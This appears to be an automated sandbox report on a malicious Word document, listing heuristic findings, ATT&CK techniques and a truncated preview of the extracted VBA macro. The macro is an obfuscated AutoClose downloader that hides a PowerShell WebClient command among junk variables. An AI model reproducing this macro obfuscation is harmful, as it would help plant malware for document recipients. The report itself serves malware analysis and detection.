Verdict: MALICIOUS
Risk Score: 230
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoClose function that is triggered when the document is closed. This macro uses the Shell() function to execute a command. The reconstructed command string 'cli';$uorjenhuhxe');(';$uorjenhuhxe' suggests it is intended to download and execute a second-stage payload, likely via PowerShell. The presence of CreateObject and Environ() calls further supports this malicious intent.
Heuristics (8)

| Finding | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected (5 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Auto_Close macro | high | OLE_VBA_AUTOCLOSE | Auto_Close macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

URLs extracted for EMBEDDED_URL (all found in document text, OLE body):

- http://ns.adobe.com/xap/1.0/
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#
- http://ns.adobe.com/photoshop/1.0/
- http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46164 bytes | 3b3f05b000c189c8243f11b48540de7bf43db66c7dc9d95874d569fc824771dd |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoClose()
hnii50 = -8 + 53
mpay = -32762
xio = 57419
wowqb = Not (mpay > xio)
ouzpoo8 = "cli';$"
oyuzdyao = -13 + 108
htojreau = -91 + 136
wymenh = "nsaydliuejjiyku"
y = -7131
oxe = (Not y)
u = -28790
sw = (Not u)
mqgsapm = "gqv='et.Web';$y"
idxdsge = -127 + 179
iiwiey = -5 + 90
soufur = -30 - 130
eajfu = -65494
lsbrkzsw = (Not eajfu)
ydhnwi = "uuxfveqyadze"
obpsegm = -12 + 61
Z = 28221
cvfi = (Not Z)
xww = -38770
xtgvr = (Not xww)
yee = 59148
qdr = -64605
pkevo = Not (yee < qdr)
eeeoynz = "yvdaq"
pruk = -64859
eia = (Not pruk)
Dim ouqfewxio As String
ouqfewxio = -69 - 125
Dim igrydp As String
igrydp = -82 * 28
uu = -65332
axqa9 = (Not uu)
us = 3170
a = (Not us)
uf = 52021
fjf = (Not uf)
uuby = "kd='"
xycbnqxkai = -96 / 52
gckaa77 = -74 + 106
y = 19669
uf = (Not y)
rfajcm = -132 + 22
yukkoa = -47 + 81
dnyzckq = -154 / 1
acxiiog = "xe'');(';$uorjenhuh"
ueuupigy = -145 * 174
Dim oviglwje As String
oviglwje = -152 - 39
yicoeo = "eaw"
osfuu = -150 + 106
cnztdaagext = -3 * 75
ez = -59572
ueee42 = 45444
a = Not (ez > ueee42)
ehtvb = -115 * 19
opztz = 30926
fs = (Not opztz)
blkkglovm = -176 * 29
eug = -65360
iejz = (Not eug)
jxqupc = -171 - 76
qsfwoyo = ouzpoo8 & wymenh & mqgsapm & ydhnwi & eeeoynz & uuby & acxiiog & yicoeo
joejz = 16696
l = -10787
gha = Not (joejz <= l)
soeaatr13 = -41 / 55
hzos = 61060
alau25 = (Not hzos)
wsznoyr = "dzeyvdaqk"
ee = -51756
ey = (Not ee)
moysnk7 = -120 + 129
Dim flneee As String
flneee = -44 / 168
zyfce75 = -174 + 5
jieo = "d+$ygnliongiyeau"
xbawa1 = -31 - 14
sgoe2 = -81 + 53
oplcc = 58049
ovai7 = 11397
fwbmc80 = Not (oplcc < ovai7)
ewlopaaa9 = -167 * 170
Dim flgvzbttsa98 As Integer
flgvzbttsa98 = -115 + 81
eumldae = "earmaoxb+$t"
uuqli = -48 + 107
ajbfoarg7 = -146 * 160
ou = 4227
yggivh = (Not ou)
xaxwg = 40434
oirg = (Not xaxwg)
zoisa = "iemhf"
eiwyy = -83 + 153
vyieai = "te"
ibhepg6 = 30364
ivy = (Not ibhepg6)
mqyhiviisq = -164 - 138
aywmt = -13530
czy = (Not aywmt)
E = -34800
pqqxi = (Not E)
qqsgsny = "mp"
eao = 33994
oua = -62404
zk = Not (eao > oua)
rhyjosti = -174 * 154
asmte = -52049
wgzr70 = 61282
tdayjs = Not (asmte > wgzr70)
oucyig = vyieai & qqsgsny
ugplsuku = -34 / 146
ac = 51488
uphe = -19269
wg = Not (ac < uphe)
orryeqde = -169 + 153
ll = -43555
sn = -34335
ep = Not (ll > sn)
rveyaqtkz84 = -43 / 152
eyoqhga4 = -9 * 26
eueousf = "fiqza"
ntioy = -85 * 148
yfy = 27471
bo = 30423
aao = Not (yfy > bo)
ywhhwxbyn = -116 + 178
stcea = "dqjpixuo0+$zx"
aaeg = -2461
yyg = (Not aaeg)
yfaixkhia = -50 / 61
urwhteqt2 = -143 / 67
cteabowe = -166 * 63
E = -11764
zhd = -35668
uf = Not (E <= zhd)
irmthou = "e"
oyuxg3 = "haxaura"
dw = 20719
be = (Not dw)
hlruq = -142 * 162
y = 61175
y = (Not y)
Dim xiio95 As Integer
xiio95 = -37 / 49
xqouzsa = "ooj1+$e"
u = 38704
rtg = -4714
qviuo = Not (u > rtg)
yikgizv = -101 + 29
Dim odfoiyi As Integer
odfoiyi = -30 + 30
icl = -21497
zio = (Not icl)
kxwrvy = -63 * 108
ujew = -54642
qaske = (Not ujew)
uedblc = wsznoyr & jieo & eumldae & zoisa & eueousf & stcea & irmthou & oyuxg3 & xqouzsa
igm = -27331
xqinn = -40298
o = Not (igm <= xqinn)
koy = -55040
shc = (Not koy)
ao = -5139
gd = 51295
qma = Not (ao < gd)
sgerjzw1 = "$jrr"
il = 65549
koe = (Not il)
zknskasve = -137 * 75
yyia = -56 - 19
yju = 15135
qwert = Val(Application.MailSystem) Like Val(1)
u = (Not yju)
Dim tkcqdtvawd As String
tkcqdtvawd = -63 + 142
bvwhpdi64 = "hioihyd"
cvnyozebxu = -79 / 11
iyy = 11781
i = -14774
iqqm9 = Not (iyy >= i)
yqnnrw = "ogcna"
dhjzegxuan = -133 - 131
xteyw = 761
yswz = -43775
amhnv7 = Not (xteyw >= yswz)
raee = -38092
jba = 42525
a = Not (raee > jba)
xhwoe = -9768
eo
... (truncated)